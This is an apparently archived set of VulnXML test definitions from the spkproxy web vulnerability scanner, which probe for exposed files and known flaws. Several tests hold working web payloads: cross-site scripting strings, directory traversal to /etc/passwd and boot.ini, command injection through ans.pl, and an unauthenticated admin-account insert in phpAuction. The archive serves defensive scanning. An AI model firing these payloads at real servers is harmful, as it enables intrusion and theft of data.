implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-553.xml0100664000076500007650000000704007566204543017562 0ustar davedave (WebTrend/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /WebTrend/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-554.xml0100664000076500007650000000704207566204543017565 0ustar davedave (Web_store/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Web_store/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-555.xml0100664000076500007650000000703407566204543017567 0ustar davedave (wstats/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /wstats/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-556.xml0100664000076500007650000000705707566204543017575 0ustar davedave (WS_FTP.ini) "Can contain saved passwords for ftp sites" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /WS_FTP.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-557.xml0100664000076500007650000000705707566204543017576 0ustar davedave (ws_ftp.ini) "Can contain saved passwords for ftp sites" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ws_ftp.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-558.xml0100664000076500007650000000703407566204543017572 0ustar davedave (wusage/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /wusage/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-559.xml0100664000076500007650000000703607566204543017575 0ustar davedave (www-sql/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /www-sql/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-55.xml0100664000076500007650000000725307566204543017505 0ustar davedave (index.html.se) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.se HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-560.xml0100664000076500007650000000702607566204543017564 0ustar davedave (www/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /www/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-561.xml0100664000076500007650000000703607566204543017566 0ustar davedave (wwwjoin/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /wwwjoin/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-562.xml0100664000076500007650000000703407566204543017565 0ustar davedave (wwwlog/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /wwwlog/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-563.xml0100664000076500007650000000704707566204543017572 0ustar davedave (wwwstats.html) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /wwwstats.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-564.xml0100664000076500007650000000704007566204543017564 0ustar davedave (wwwstats/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /wwwstats/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-565.xml0100664000076500007650000000704007566204543017565 0ustar davedave (zipfiles/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /zipfiles/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-566.xml0100664000076500007650000000704007566204543017566 0ustar davedave (_private/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /_private/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-567.xml0100664000076500007650000000704507566204543017574 0ustar davedave (~root/) "Allowed to browse root's home directory" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /~root/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-568.xml0100664000076500007650000000711507566204543017573 0ustar davedave (boot.ini) "Server is vulnerable to directory traversal 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ////./../.../boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-569.xml0100664000076500007650000000751407566204543017577 0ustar davedave (<script>alert('Vulnerable')</script>) "JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /a.jsp/<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-56.xml0100664000076500007650000000725307566204543017506 0ustar davedave (index.html.tw) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.tw HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-570.xml0100664000076500007650000000715407566204543017567 0ustar davedave (getuserdesc.asp) "Hosting Controller 2002 administration page is available. This should be protected." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /accounts/getuserdesc.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-571.xml0100664000076500007650000000713607566204543017570 0ustar davedave (/) "The web server is the CobaltRaq administrator. If password protection is broken 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Admin/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ CobaltServer 200 CobaltServer 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-572.xml0100664000076500007650000000770107566204543017567 0ustar davedave (login.php?path=\"></form><form name=a><input name=i value=XSS>&lt;script>alert('Vulnerable')</script>) "mcNews 1.1a from phpforums.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin/login.php?path=\"></form><form name=a><input name=i value=XSS>&lt;script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-573.xml0100664000076500007650000000720407566204543017566 0ustar davedave (admin_phpinfo.php4) "Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin/admin_phpinfo.php4 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-574.xml0100664000076500007650000000727407566204543017576 0ustar davedave (browse.asp?FilePath=c:\&Opt=2&level=0) "Hosting Controller from hostingcontroller.com allows any file on the system to be read remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin/browse.asp?FilePath=c:\&Opt=2&level=0 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ winnt 200 winnt 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-575.xml0100664000076500007650000000717207566204543017574 0ustar davedave (cplogfile.log) "DevBB 1.0 final (http://www.mybboard.com) log file is readable remotely. Upgrade to the latest version." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin/cplogfile.log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-576.xml0100664000076500007650000000740207566204543017571 0ustar davedave (login.php?action=insert&username=test&password=test) "phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin/login.php?action=insert&username=test&password=test HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-577.xml0100664000076500007650000000710107566204543017566 0ustar davedave (order.log) "Selena Sol's WebStore 1.0 exposes order information 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /Admin_files/order.log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-578.xml0100664000076500007650000000767407566204543017606 0ustar davedave (catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>) "Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ CAN-2001-1212 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-579.xml0100664000076500007650000000722007566204543017572 0ustar davedave (ans.pl?p=../../../../../usr/bin/id|&blah) "Avenger's News System allows commands to be issued remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ans/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ uid 200 uid 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-57.xml0100664000076500007650000000726507566204543017512 0ustar davedave (index.html.tw.Big5) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.tw.Big5 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-580.xml0100664000076500007650000000731207566204543017564 0ustar davedave (login.php) "Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS/HTML injection and may allow users to bypass login requirements. http://anthill.vmlinuz.ca/ and CA-2000-02" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /anthill/login.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-581.xml0100664000076500007650000000716307566204543017571 0ustar davedave (metacart.mdb) "MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ASP/cart/database/metacart.mdb HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-582.xml0100664000076500007650000000735307566204543017573 0ustar davedave (b2edit.showposts.php) "Some versions of B2 (cafelog.com) are vulnerable to remote inclusion by redefining $b2inc to a remote php file. Upgrade to a version higher than b2.06pre2. This vulnerability could not be confirmed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /b2-include/b2edit.showposts.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-583.xml0100664000076500007650000000730307566204543017567 0ustar davedave (readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1) "Remote file retrieval." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-584.xml0100664000076500007650000000706707566204543017577 0ustar davedave (faxsurvey) "This may allow arbitrary command execution." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /bb-dnbd/faxsurvey HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-585.xml0100664000076500007650000000706407566204543017575 0ustar davedave (cart.cgi) "If this is Dansie shopping cart 3.0.8 or earlier 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cartcart.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-586.xml0100664000076500007650000000710207566204543017567 0ustar davedave (ccbill.log) "This might be interesting... CC Bill log file?" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ccbill/secure/ccbill.log HTTP/1.0 The HTTP Response Code 